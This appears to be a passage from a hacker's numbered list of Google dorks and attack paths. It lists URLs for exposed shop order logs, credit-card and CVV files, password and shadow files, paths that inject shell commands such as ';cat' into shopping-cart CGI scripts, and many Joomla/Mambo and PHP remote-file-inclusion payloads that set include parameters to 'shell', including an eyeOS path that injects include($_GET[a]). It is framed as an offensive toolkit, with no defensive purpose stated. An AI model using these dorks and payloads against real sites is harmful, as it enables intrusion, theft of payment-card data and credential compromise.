  3261. /cgi-local/orders/orders.txt
  3262. /cgi-bin/PDG_Cart/mc.txt
  3263. /cgibin/cart35.exe
  3264. /cgi-bin/Shopper.exe?search=action&keywords=psiber%&template=other/risinglogorder.log
  3265. /ecommerce/admin/user/admin.asp
  3266. /data/productcart/database/EIPC.mdb
  3267. /_database/shopping.mdb
  3268. /cgi-sys/pagelog.cgi
  3269. /cgi-sys/shop.pl/page=;cat%shop.pl
  3270. /scripts/weblog
  3271. /htbin/shop/orders/orders.txt
  3272. /cgi-bin/%shopper.cgi?preadd=action&key=PROFA&template=myorder.log
  3273. /tienda/shopdbtest.asp
  3274. /WebShop/logs/ck.log
  3275. /fpdb/shopping.mdb
  3276. /mysql/store.mdb
  3277. /commerce_user_lib.pl
  3278. /cvv.asp
  3279. /wwwlog
  3280. /cool-logs/mlog.html
  3281. /cgis/shop/orders/orders.txt
  3282. /cgi/PDG_Cart/order.log
  3283. /Admin_files/ccelog.txt
  3284. /Catalog/config/datasources/Expire.mdb
  3285. /ecommerce/admin/shopdbtest.asp
  3286. /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log
  3287. /cgi-bin/Count.cgi?df=callcard.dat
  3288. /shopping/shopping.mdb
  3289. /cgis/DCShop/auth_data/auth_user_file.txt
  3290. /cgi-bin/dcshop.cgi
  3291. /HBill/config
  3292. /WebCart/orders.txt
  3293. /PDG_Cart/authorizenets.txt
  3294. /cgi-bin/AnyForm
  3295. /logger/
  3296. /webcart-lite/orders/import.txt
  3297. /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl
  3298. /cgi-bin/PDG_Cart/shopper.conf
  3299. /cgi-bin/cart.exe
  3300. /dc/orders/orders.txt
  3301. /cgi-local/DCShop/orders/orders.txt
  3302. /shop.pl/page=shop.cfg
  3303. /cgi-local/cart.exe
  3304. /cgi-win/pagelog.cgi
  3305. /cgi-win/shop/orders/orders.txt
  3306. /cgibin/shopper.cgi?search=action&keywords=moron&template=order.csv
  3307. /cgi-sys/DCShop/auth_data/auth_user_file.txt
  3308. /cgi-bin/www-sql;;;
  3309. /cgi-bin/%shopper.cgi?preadd=action&key=PROFA&template=order.log
  3310. /scripts/orders/orders.txt
  3311. /cgi-local/shop.pl/shop.cfg
  3312. /search=action&keywords=cwtb%&template=expire.mdb
  3313. /php/mylog.phtml
  3314. /config/datasources/shopping.mdb
  3315. /php-coolfile/action.php?action=edit&file=config.php
  3316. /cgi-bin/ezmall/mall.cgi
  3317. /cgi/DCShop/orders/orders.txt
  3318. /cgi-local/shop.pl
  3319. /cgis/DCShop/orders/orders.txt
  3320. /product/shopdbtest.asp
  3321. /ASP/cart/database/metacart.mdb
  3322. /cgi-bin/cgi-lib.pl
  3323. /cgi-bin/mailview.cgi?cmd=view&fldrname=inbox&select=&html
  3324. /search=action&keywords=cwtb%&template=order.log
  3325. /mysql/expire.mdb
  3326. /scripts/shop/auth_data/auth_user_file.txt
  3327. /cgi-bin/cart/whatever-OUTPUT.txt
  3328. /Shopping%Cart/shopdbtest.asp
  3329. /cgi/shop/auth_data/auth_user_file.txt
  3330. /shop/shopping.mdb
  3331. /cgi-bin/store/Authorize_Net.pl
  3332. /scripts/DCShop/orders/orders.txt
  3333. /store/log_files/commerce_user_lib.pl
  3334. /shopping/shopadmin.asp
  3335. /cgi-bin/orderlog.txt
  3336. /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%../../webcart/system/orders/orders.txt|&CODE=PHOLD;;;
  3337. /cool-logs/mylog.html
  3338. /cgibin/shop.pl/page=;cat%shop.pl
  3339. /htbin/shop.pl/page=;cat%shop.pl
  3340. /cgi-win/orders/orders.txt
  3341. /cgi-bin/%shopper.cgi?preadd=action&key=PROFA&template=order.txt
  3342. /SHOP/shopdbtest.asp
  3343. /cgi/pagelog.cgi
  3344. /php/mlog.phtml
  3345. /cgi-bin/shop/apdproducts.mdb
  3346. /htbin/shop/auth_data/auth_user_file.txt
  3347. /server%logfile;;;
  3348. /database/metacart.mdb
  3349. /cgi-local/shop/orders/orders.txt
  3350. password dorks
  3351. intitle:”index of” spwd.db passwd -pam.conf
  3352. filetype:bak inurl:”htaccess¦passwd¦shadow¦htusers
  3353. filetype:inc intext:mysql_connect
  3354. inurl:”wvdial.conf” intext:”password”
  3355. filetype:mdb wwforum
  3356. filetype:reg reg +intext:”defaultusername” intext:”defaultpassword”
  3357. filetype:reg reg +intext:”internet accoount manager”
  3358. filetype:ini ws_ftp pwd
  3359. inurl:/wwwboard
  3360. filetype:htpasswd htpasswd
  3361. intitle:”Index of .htpasswd -intitle:”dist -apache -htpasswd.c
  3362. index.of.private (algo privado)
  3363. intitle:index.of master.passwd
  3364. inurl:passlist.txt (para encontrar listas de passwords)
  3365. intitle:”Index of..etc passwd
  3366. intitle:admin intitle:login
  3367. Incorrect syntax near (SQL script error)
  3368. intitle:”the page cannot be found inetmgr (debilidad en IIS)
  3369. Supplied arguments is not a valid PostgreSQL result (possible debilidad SQL)
  3370. _vti_pvt password intitle:index.of (Frontpage)
  3371. inurl:backup intitle:index.of inurl:admin
  3372. Index of/backup
  3373. index.of.password
  3374. index.of.winnt
  3375. inurl:”auth_user_file.txt
  3376. Index of/admin
  3377. Index of/password
  3378. Index of/mail
  3379. Index of/ +passwd
  3380. Index of/ +.htaccess
  3381. Index of ftp +.mdb allinurl:/cgi-bin/ +mailto
  3382. allintitle: index of/admin
  3383. allintitle: index of/root
  3384. allintitle: sensitive filetype:doc
  3385. allintitle: restricted filetype:doc site:gov
  3386. administrator.pwd.index
  3387. service.pwd.index
  3388. inurl:passwd filetype:txt
  3389. inurl:iisadmin
  3390. inurl:”wwwroot/*.
  3391. intitle:”Index of .sh_history
  3392. intitle:”Index of .bash_history
  3393. intitle:”Index of passwd
  3394. intitle:”Index of people.st
  3395. intitle:”Index of pwd.db
  3396. intitle:”Index of etc/shadow
  3397. intitle:”Index of spwd
  3398. intitle:”Index of master.passwd
  3399. intitle:”Index of htpasswd
  3400. intitle:”Index of members OR accounts
  3401. intitle:”Index of user_carts OR user _cart
  3402. “Index of/password”
  3403. “Index of/mail”
  3404. “Index of/” +.htaccess
  3405. index of ftp +.mdb allinurl:/cgi-bin/ +mailto
  3406. gobal.asax index
  3407. allintitle: “index of/admin”
  3408. inurlasswd filetype:txt
  3409. intitle:”Index of” .sh_history
  3410. intitle:”index of” pwd.db
  3411. intitle:”index of” etc/shadow
  3412. intitle:”index of” members OR accounts
  3413. –alternative inputs–
  3414. _vti_inf.html
  3415. users.pwd
  3416. authors.pwd
  3417. administrators.pwd
  3418. default.asp
  3419. hello.bat
  3420. default.asp\
  3421. dvwssr.dll
  3422. cart.exe
  3423. add.exe
  3424. index.cfm
  3425. page.cfm
  3426. web_store.cgi
  3427. upload.asp
  3428. pbserver.dll
  3429. phf
  3430. test-cgi
  3431. Count.cgi
  3432. php.cgi
  3433. php
  3434. nph-test-cgi
  3435. handler
  3436. webgais
  3437. websendmail
  3438. faxsurvey
  3439. wwwboard.pl
  3440. www-sql
  3441. view-source
  3442. aglimpse
  3443. man.sh
  3444. AT-admin.cgi
  3445. files.pl
  3446. bnbform.cgi
  3447. cgiwrap
  3448. perl
  3449. names.nsf
  3450. dumpenv.pl
  3451. submit.cgi
  3452. responder.cgi
  3453. infosrch.cgi
  3454. publisher
  3455. ultraboard.cgi
  3456. db.cgi
  3457. ssi
  3458. adpassword.txt
  3459. redirect.cgi
  3460. login.jsp
  3461. dbconnect.inc
  3462. admin
  3463. htgrep
  3464. wais.pl
  3465. amadmin.pl
  3466. news.cgi
  3467. auctionweaver.pl
  3468. .htpasswd
  3469. access.log
  3470. log.txt
  3471. logfile.html
  3472. stat.htm
  3473. stats.htm
  3474. stats.html
  3475. wwwstats.html
  3476. mailto.cgi
  3477. cached_feed.cgi
  3478. global.cgi
  3479. Search.pl
  3480. common.php
  3481. WSFTP.LOG
  3482. index.php~
  3483. index.php.bak
  3484. print.cgi
  3485. register.cgi
  3486. webdriver
  3487. bbs_forum.cgi
  3488. sendmail.inc
  3489. CrazyWWWBoard.cgi
  3490. search.pl
  3491. way-board.cgi
  3492. webpage.cgi
  3493. pwd.dat
  3494. adcycle
  3495. post-query
  3496. /arg;
  3497. /favicon.ico
  3498. /stats/admin.mdb
  3499. /shopdbtest.asp
  3500. /cgi-bin/test.pl
  3501. /cgi-bin/env.cgi
  3502. /photos/protest/styles.css
  3503. http://hpcgi.nifty.com/trino/ProxyJ/prxjdg.cgi
  3504. /cgi-bin/whereami.cgi
  3505. /cgi/test.cgi
  3506. /chevy/index.htm
  3507. /cgi-bin/test.cgi
  3508. /ccbill/glocation.cgi
  3509. /cgi-bin/styles.css
  3510. /cgi-bin/shopper.cgi
  3511. /news_–.htm
  3512. /cgi-bin/calendar/calendar.pl
  3513. /venem.htm
  3514. /cgi-bin/where.pl
  3515. /cgibin/shopper.cgi&TEMPLATE=ORDER.LOG
  3516. /cgibin/recon.cgi
  3517. /cgibin/test.cgi
  3518. /cgi-bin/recon.cgi
  3519. /cgi-bin/where.cgi
  3520. /stats/www.gregoryflynn.com/chevy
  3521. /ccbill/whereami.cgi
  3522. /ibill/whereami.cgi
  3523. /cgi-bin/lancelot/recon.cgi
  3524. /cgi-bin/htmanage.cgi
  3525. /stats/www.tysons.net/stats/-refers.htm
  3526. /cgi-bin/calendar/calendar_admin.pl
  3527. /cgibin/ibill/count.cgi
  3528. /cgi-bin/nbmember.cgi
  3529. /cgi-bin/mastergate/accountcreate.cgi
  3530. /cgi-bin/ibill/accountcreate.cgi
  3531. /cgibin/MasterGate/count.cgi
  3532. /cgi-bin/amadmin.pl
  3533. /cgibin/igate/count.cgi
  3534. /stats/www.gregoryflynn.com/stats/-refers.htm
  3535. /cgi-local/DCShop/auth_data/styles.css
  3536. /cgi-bin/add-passwd.cgi
  3537. /cgi-bin/MasterGate/count.cgi
  3538. /apps_shop.htm%/comersus/database/comersus.mdb
  3539. /epwd/ws_ftp.log
  3540. /stats/www.dialacure.com/stats/-refers.htm
  3541. /wwii/styles.css
  3542. /cgi-bin/admin.mdb
  3543. /cgi-bin/ibill-tools/count.cgi
  3544. /cgibin/ibill/accountcreate.cgi
  3545. /cgi/mastergate/count.cgi
  3546. /cgi-bin/EuroDebit/addusr.pl
  3547. /cgi-bin/dbm-passwd.cgi
  3548. /cgi/igate/accountcreate.cgi
  3549. /cg i-bin/DCShop/Orders/orders.txt
  3550. /ccbill/secure/ccbill.log
  3551. / cvv.txt
  3552. /WebShop/logs/cc.txt
  3553. /config/—.mdb
  3554. /cgi-bin/ezmall/mall.cgi?page=../mall_log_files/order.log%html
  3555. /or ders/orders.txt
  3556. /webcart/carts
  3557. /cgi-bin/cart.exe/cartclientlist
  3558. /comersus/database/comersus.mdb
  3559. /WebShop/temp lates/cc.txt
  3560. /cgi-sys/cart.pl
  3561. /productcart/database/EIPC.mdb
  3562. /config/datasources/myorder.mdb
  3563. /bin/cart.pl
  3564. /cgi-bin/cart.ini
  3565. /database/comersus.mdb
  3566. /cgi-local/medstore/loadpage.cgi?user_id= id&file=data/orders.txt
  3567. /cgi-bin/store/Admin_files/myorderlog.txt
  3568. /fpdb/shop.mdb
  3569. /cgi-bin/shop.cgi
  3570. /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi
  3571. /log_files/yo ur_order.log
  3572. /_database/expire.mdb
  3573. /HyperStat/stat_what.log
  3574. /cgi bin/DCShop/auth_data/auth_user_file.txt
  3575. /htbin/orders/orders.txt
  3576. /index.cgi?page=../admin/files/order.log
  3577. /webcart/config
  3578. /PDG/order.txt
  3579. /easylog/easylog.html
  3580. /cgi-bin/%shopper.cgi?preadd=action&key=PROFA&template=shopping.mdb
  3581. /comersus_message.asp?
  3582. /cgi-bin/shop.pl/page=;cat%shop.pl
  3583. /cgi-bin/shopper?search=action&keywords=dhenzuser%&template=order.log
  3584. /HBill/htpasswd
  3585. /cgi-bin/cs/shopdbtest.asp
  3586. /Catalog/config/datasources/Products.mdb
  3587. /cgi/orders/orders.txt
  3588. /cgi-local/PDG_Cart/shopper.conf
  3589. /store/cgi-bin/—.mdb
  3590. /derbyteccgi/shopper.cgi?key=SC&preadd=action&template=order.log
  3591. /cgi-bin/mc.txt
  3592. /cgi-bin/shopper.cgi?search=action&keywords=root%&template=order.log
  3593. /scripts/ shop/orders/orders.txt
  3594. / cgi-bin/PDG_Cart/mc.txt
  3595. /cgibin/password.txt
  3596. /Catalog/cart/carttrial.dat
  3597. /catalog/Admin/Admin.asp
  3598. /store/admin_files/commerce_user_lib.pl
  3599. /cgi-bin/store/index.cgi
  3600. /paynet.txt
  3601. /config/datasources/store/billing.mdb
  3602. /cgi-bin/shopper.exe?search
  3603. /cgi/shop.pl/page=;cat%shop.pl
  3604. /cgi-bin/store/Admin_files/orders.txt
  3605. /cgi-bin/store/commerce_user_lib.pl
  3606. /cgi-sys/shop.pl/ page=;cat%shop.pl
  3607. /cgi-bin/shopper.exe?search=action&keywords=psiber&template=order.log
  3608. /mall_log_files/
  3609. /cgi-bin/perlshop.cgi
  3610. /cgi-bin/shopper.cgi?search=action&keywords=whinhall&template=order.log
  3611. /cgi-bin/store/Admin_files/commerce_user_lib.pl
  3612. /config.dat
  3613. /order/order.log
  3614. /Admin_files/AuthorizeNet_user_lib.pl
  3615. /cgi-bin/cart/CART-order.txt
  3616. /cgi-bin/pass/merchant.cgi.log
  3617. /cgi-local/pagelog.cgi
  3618. /cgi-bin/pagelog.cgi
  3619. /cgi-bin/orders/cc.txt
  3620. /admin/admin_conf.pl
  3621. /cgi-bin/pdg_cart/order.log
  3622. /cgi-bin/orders/mc.txt
  3623. /cgi/cart.exe
  3624. /ecommerce/admin/admin.asp
  3625. /scripts/DCShop/auth_data/auth_user_file.txt
  3626. /Catalog/config/—.mdb
  3627. /mysql/mystore.mdb
  3628. /cgi-bin/%shopper.cgi?preadd=action&key=PROFA&template=shopping.asp
  3629. /logfiles/
  3630. /admin/configuration.pl
  3631. /cgis/cart.exe
  3632. / cgi-bin/dcshop.cgi
  3633. /cgi-win/shop/auth_data/auth_user_file.txt
  3634. /cgi-bin/shop/index.cgi?page=../admin/files/order.log
  3635. /search=action&keywords=GSD%&template=order.log
  3636. /PDG_Cart/ authorizenets.txt
  3637. /~gcw/cgi-bin/Count.cgi?df=callcard.dat
  3638. /cgi-bin/PDG_Cart/order.log
  3639. /expire.mdb
  3640. Dorks Joomla
  3641. inurl:”com_admin”
  3642. administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=shell
  3643. inurl:index.php?option=com_simpleboard
  3644. /components/com_simpleboard/file_upload.php?sbp=shell
  3645. inurl:”com_hashcash”
  3646. /components/com_hashcash/server.php?mosConfig_absolute_path=shell
  3647. inurl:”com_htmlarea3_xtd-c”
  3648. /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=shell
  3649. inurl:”com_sitemap”
  3650. /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=shell
  3651. inurl:”com_performs”
  3652. components/com_performs/performs.php?mosConfig_absolute_path=shell
  3653. inurl:”com_forum”
  3654. inurl:”com_pccookbook”
  3655. components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=shell
  3656. inurl:index.php?option=com_extcalendar
  3657. /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=shell
  3658. inurl:”minibb”
  3659. components/minibb/index.php?absolute_path=shell
  3660. inurl:”com_smf”
  3661. /modules/mod_calendar.php?absolute_path=shell
  3662. inurl:”com_pollxt”
  3663. /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=shell
  3664. inurl:”com_loudmounth”
  3665. /components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=shell
  3666. inurl:”com_videodb”
  3667. /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=shel l
  3668. inurl:index.php?option=com_pcchess
  3669. /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=shell
  3670. inurl:”com_multibanners”
  3671. /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=sh ell
  3672. inurl:”com_a6mambohelpdesk”
  3673. /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=shel l
  3674. inurl:”com_colophon”
  3675. /administrator/components/com_colophon/admin.colophon.php?mosConfig_absolute_path=shell
  3676. inurl:”com_mgm”
  3677. administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=shell
  3678. inurl:”com_mambatstaff”
  3679. /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=shell
  3680. inurl:”com_securityimages”
  3681. /components/com_securityimages/configinsert.php?mosConfig_absolute_path=shell
  3682. /components/com_securityimages/lang.php?mosConfig_absolute_path=shell
  3683. inurl:”com_artlinks”
  3684. /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=shell
  3685. inurl:”com_galleria”
  3686. /components/com_galleria/galleria.html.php?mosConfig_absolute_path=shell
  3687. inurl:”com_akocomment”
  3688. /akocomments.php?mosConfig_absolute_path=shell
  3689. inurl:”com_cropimage”
  3690. administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=shell
  3691. inurl:”com_kochsuite”
  3692. /administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=shell
  3693. inurl:”com_comprofiler”
  3694. administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=shell
  3695. inurl:”com_zoom”
  3696. /components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=shell
  3697. /components/com_zoom/includes/database.php?mosConfig_absolute_path=shell
  3698. inurl:”com_serverstat”
  3699. /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=she ll
  3700. inurl:”com_fm”
  3701. components/com_fm/fm.install.php?lm_absolute_path=shell
  3702. inurl:com_mambelfish
  3703. administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=shell
  3704. inurl:com_lmo
  3705. components/com_lmo/lmo.php?mosConfig_absolute_path=shell
  3706. inurl:com_linkdirectory
  3707. administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=shell
  3708. inurl:com_mtree
  3709. components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_pat h=shell
  3710. inurl:com_jim
  3711. administrator/components/com_jim/install.jim.php?mosConfig_absolute_path=shell
  3712. inurl:com_webring
  3713. administrator/components/com_webring/admin.webring.docs.php?component_dir=shell
  3714. inurl:com_remository
  3715. inurl:com_babackup
  3716. administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=shell
  3717. inurl:com_lurm_constructor
  3718. administrator/components/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=shell
  3719. inurl:com_mambowiki
  3720. components/com_mambowiki/ MamboLogin.php?IP=shell
  3721. inurl:com_a6mambocredits
  3722. administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=shell
  3723. inurl:com_phpshop
  3724. administrator/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=s hell
  3725. inurl:com_cpg
  3726. components/com_cpg/cpg.php?mosConfig_absolute_path=shell
  3727. inurl:com_moodle
  3728. components/com_moodle/moodle.php?mosConfig_absolute_path=shell
  3729. inurl:com_extended_registration
  3730. components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p ath=shell
  3731. inurl:com_mospray
  3732. components/com_mospray/scripts/admin.php?basedir=shell
  3733. inurl:com_bayesiannaivefilter
  3734. /administrator/components/com_bayesiannaivefilter/lang.php?mosConfig_absolute_path=shell
  3735. inurl:com_uhp
  3736. /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=shell
  3737. inurl:com_peoplebook
  3738. /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=shell
  3739. inurl:com_mmp
  3740. /administrator/components/com_mmp/help.mmp.php?mosConfig_absolute_path=shell
  3741. inurl:com_reporter
  3742. /components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=shell
  3743. inurl:com_madeira
  3744. /components/com_madeira/img.php?url=shell
  3745. inurl:com_jd-wiki
  3746. /components/com_jd-wiki/lib/tpl/default/main.php?mosConfig_absolute_path=shell
  3747. inurl:com_bsq_sitestats
  3748. /components/com_bsq_sitestats/external/rssfeed.php?baseDir=shell
  3749. /com_bsq_sitestats/external/rssfeed.php?baseDir=shell
  3750. –rfi dorks–
  3751. inurl:/cpcommerce/_functions.php?prefix=
  3752. inurl:/eblog/blog.inc.php?xoopsConfig[xoops_url]=
  3753. inurl:/pm/lib.inc.php?pm_path=
  3754. inurl:/includes/include_once.php?include_file=
  3755. inurl:/index.php/main.php?x=
  3756. inurl:/index.php?pg=
  3757. inurl:/db.php?path_local=
  3758. inurl:/index.php?site=
  3759. inurl:/helpcenter/inc/pipe.php?HCL_path=
  3760. inurl:/phpgwapi/setup/tables_update.inc.php?appdir=
  3761. inurl:/includes/calendar.php?phpc_root_path=
  3762. inurl:/include/authform.inc.php?path_pre=
  3763. inurl:*.php?session=&content=
  3764. inurl:*.php?loc=
  3765. inurl:*.php?inf=
  3766. inurl:*.php?load=
  3767. allinurl:/index.php?file= site:*.dk
  3768. /pivot/modules/module_db.php?pivot_path=
  3769. /coppermine/themes/maze/theme.php?THEME_DIR=
  3770. /allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=
  3771. /agendax/addevent.inc.php?agendax_path=
  3772. /becommunity/community/index.php?pageurl=
  3773. /index4.php?body=
  3774. /content.php?page=
  3775. /index.php?show=
  3776. /index2.php?page=
  3777. allinurl:xgallery site:.org
  3778. allinurl:4nAlbum site:.org
  3779. allinurlP:NphpBB2 site:.org
  3780. Keyword : “powered by AllMyLinks”
  3781. allinurl:/modules.php?name=allmyguests
  3782. /Popper/index.php?childwindow.inc.php?form=
  3783. google = kietu/hit_js.php, allinurl:kietu/hit_js.php
  3784. keyword : “Powered by phpBB 2.0.6”
  3785. keyword : “powered by CubeCart 3.0.6”
  3786. keyword : “powered by paBugs 2.0 Beta 3”
  3787. /phorum/login.php
  3788. allinurl:ihm.php?p=*
  3789. keyword : “powered eyeOs”
  3790. allinurl:.php?bodyfile=
  3791. allinurl:/includes/orderSuccess.inc.php?glob=
  3792. /modules.php?name=
  3793. Key Word: ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
  3794. “powered by Fantastic News v2.1.2”
  3795. allinurl: /osticket/
  3796. keyword : “Powered by iUser”
  3797. allinurl: “static.php?load=”
  3798. keyworld: allinurl:/phpGedview/login.php site:
  3799. inurl:”/os/pointer.php?url=”
  3800. inurl:”show.php?page=”
  3801. inurl:”index.php?langc=”
  3802. “powered by doodle cart”
  3803. “Login to Calendar”
  3804. “powered by EQdkp”
  3805. inurl:”index1.php?choix=”
  3806. inurl:surveys
  3807. allinurl:adobt sitel
  3808. “Powered By ScozNews”
  3809. /sources/functions.php?CONFIG[main_path]=
  3810. inurl:”kb_constants.php?module_root_path=”
  3811. allinurl:”mcf.php”
  3812. inurl:”main.php?sayfa=”
  3813. “MobilePublisherPHP”
  3814. “powered by phpCOIN 1.2.3″
  3815. rfi to rhis /coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=
  3816. inurl:”index.php?go=”
  3817. inurl:”index2.php?p=”
  3818. modules/module_db.php?pivot_path=
  3819. catalog/includes/include_once.php?include_file=
  3820. live/inc/pipe.php?HCL_path=
  3821. presse/stampa.php3?azione=
  3822. index.php?mainpage=
  3823. captionator.php?GALLERY_BASEDIR=
  3824. _head.php?_zb_path=.example.com
  3825. achievo/atk/javascript/class.atkdateattribute.js.php?config_atkroot=
  3826. gallery/captionator.php?GALLERY_BASEDIR=.example.com
  3827. globals.php3?LangCookie=.example.com
  3828. include/msql.php?inc_dir=
  3829. include/mysql.php?inc_dir=
  3830. page.php?template=
  3831. user/agora_user.php?inc_dir=
  3832. user/ldap_example.php?inc_dir=
  3833. eblog/blog.inc.php?xoopsConfig[xoops_url]=
  3834. modules.php?name=jokeid=
  3835. livehelp/inc/pipe.php?HCL_path=
  3836. help/faq/inc/pipe.php?HCL_path=
  3837. helpcenter/inc/pipe.php?HCL_path=
  3838. live-support/inc/pipe.php?HCL_path=
  3839. phpgwapi/setup/tables_update.inc.php?appdir=
  3840. include/authform.inc.php?path_pre=
  3841. web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=
  3842. web_statistics//tools/send_reminders.php?includedir=
  3843. web_statistics//include/write.php?dir=
  3844. web_statistics//calendar/tools/send_reminders.php?includedir=
  3845. web_statistics//coppercop/theme.php?THEME_DIR=
  3846. Gallery/displayCategory.php?basepath=
  3847. jaf/index.php?show=
  3848. bb_lib/checkdb.inc.php?libpach=
  3849. include/livre_include.php?chem_absolu=
  3850. allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
  3851. index1.php?p=
  3852. GradeMap/index.php?page=
  3853. phpopenchat/contrib/yabbse/poc.php?sourcedir=
  3854. calendar/events/datePicker.php?serverPath=
  3855. calendar/setup/setupSQL.php?serverPath=
  3856. coppercop/theme.php?THEME_DIR=
  3857. dotproject/modules/projects/addedit.php?root_dir=
  3858. dotproject/modules/tasks/addedit.php?root_dir=
  3859. contacts.php?cal_dir=
  3860. gallery/init.php?HTTP_POST_VARS=
  3861. stats/include/write.php?dir=
  3862. stats/tools/send_reminders.php?includedir=
  3863. index2.php?mosConfig_absolute_path=
  3864. new/bbs//include/write.php?dir=
  3865. /forum/auth/auth.php?phpbb_root_path=
  3866. /forum/auth/auth_phpbb/phpbb_root_path=
  3867. /aWebNews/visview.php?path_to_news=
  3868. /gallery/index.php?template=
  3869. /_wk/wk_lang.php?wkPath=
  3870. /modules/Forums/admin/admin_users.php?phpEx=
  3871. /index.php?pag=
  3872. /journal.php?m=
  3873. inurl:/b2-tools/gm-2-b2.php?b2inc=
  3874. inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
  3875. inurl:/main.php?x=
  3876. inurl:/index.php?x=
  3877. inurl:/index.php?pagina=
  3878. inurl:/index.php?show=
  3879. inurl:/index.php?cat=
  3880. inurl:/livehelp/inc/pipe.php?HCL_path=
  3881. inurl:/help/faq/inc/pipe.php?HCL_path=
  3882. inurl:/gnu/index.php?doc=
  3883. inurl:index.php?filename=
  3884. inurl:index.php?dir=
  3885. inurl:*.php?place=
  3886. inurl:*.php?layout=
  3887. inurl:*.php?mode=
  3888. inurl:*.php?name=
  3889. inurl:*.php?f=
  3890. INURL OR ALLINURL WITH:
  3891. /temp_eg/phpgwapi/setup/tables_update.inc.php?appdir=
  3892. /index.php?from_market=Y&pageurl=
  3893. /index.php?action=
  3894. /index1.php?p=
  3895. /index.php?sec=
  3896. /index.php?menu=
  3897. inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
  3898. inurl:/include/new-visitor.inc.php?lvc_include_dir=
  3899. inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=
  3900. inurl:/modules/agendax/addevent.inc.php?agendax_path=
  3901. inurl:/ashnews.php?pathtoashnews=
  3902. inurl:/myPHPCalendar/admin.php?cal_dir=
  3903. inurl:/index.php?open=
  3904. inurl:/index.php?visualizar=
  3905. inurl:/index.php?inc=
  3906. inurl:/index.php?file=
  3907. inurl:/htmltonuke.php?filnavn=
  3908. inurl:/inc/pipe.php?HCL_path=
  3909. inurl:/support/faq/inc/pipe.php?HCL_path=
  3910. inurl:/live-support/inc/pipe.php?HCL_path=
  3911. inurl:/includes/setup.php?phpc_root_path=
  3912. inurl:/inc/authform.inc.php?path_pre=
  3913. inurl:index.php?sec=
  3914. inurl:index.php?link=
  3915. inurl:index.php?document=
  3916. inurl:*.php?go=
  3917. inurl:*.php?naam=
  3918. /index.inc.php?PATH_Includes=
  3919. /poll/admin/common.inc.php?base_path=
  3920. /include/livre_include.php?no_connect=lol&chem_absolu=
  3921. /default.php?page=
  3922. /index2.php?x=
  3923. /library/lib.php?root=
  3924. /es/index.php?action=
  3925. /main_site.php?page=
  3926. /index.php?L2=
  3927. /main.php?page=
  3928. /index.php?x=
  3929. /index.php?level=
  3930. /index.php?myContent=
  3931. /index.php?TWC=
  3932. /index1.php?main=
  3933. /index.php?babInstallPath=
  3934. /index.php?z=
  3935. allinurl:my_egallery site:.org
  3936. allinurl:coppermine site:.org
  3937. allinurl:ihm.php?p=
  3938. “powered by AllMyLinks”
  3939. allinurl:/Popper/index.php?
  3940. “Powered by phpBB 2.0.6”
  3941. “powered by CubeCart 3.0.6”
  3942. “powered by paBugs 2.0 Beta 3″
  3943. /class.mysql.php?path_to_bt_dir=
  3944. allinurl:”powered by AshNews”, allinurl:AshNews atau allinurl: /ashnews.php
  3945. “powered eyeOs”
  3946. /eyeos/desktop.php?baccio=eyeOptions.eyeapp&a=eyeOptions.eyeapp&_SESSION%5busr%5d=root&_SESSION%5bapps%5d%5beyeOptions.eyeapp%5d%5bwrapup%5d=include($_GET%5ba%5d);&a=
  3947. /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=
  3948. allinurl:forums.html
  3949. allinurl:/default.php?page=home
  3950. ( Nuke ET Copyright 2004 por Truzone. ) or ( allinurl:*.edu.*/modules.php?name=allmyguests ) or ( “powered by AllMyGuests”)
  3951. allinurl:application.php?base_path=
  3952. allinurlp:hplivehelper
  3953. allinurlp:hpnuke
  3954. “powered by smartblog” AND inurl:?page=login
  3955. “Powered By FusionPHP”
  3956. allinurl:shoutbox/expanded.php filetypep:hp
  3957. /osticket/include/main.php?config[search_disp]=true&include_dir=
  3958. /common.php?include_path=
  3959. /static.php?load=
  3960. /phpcoin/login.php
  3961. allinurl:/phpGedview/login.php site:
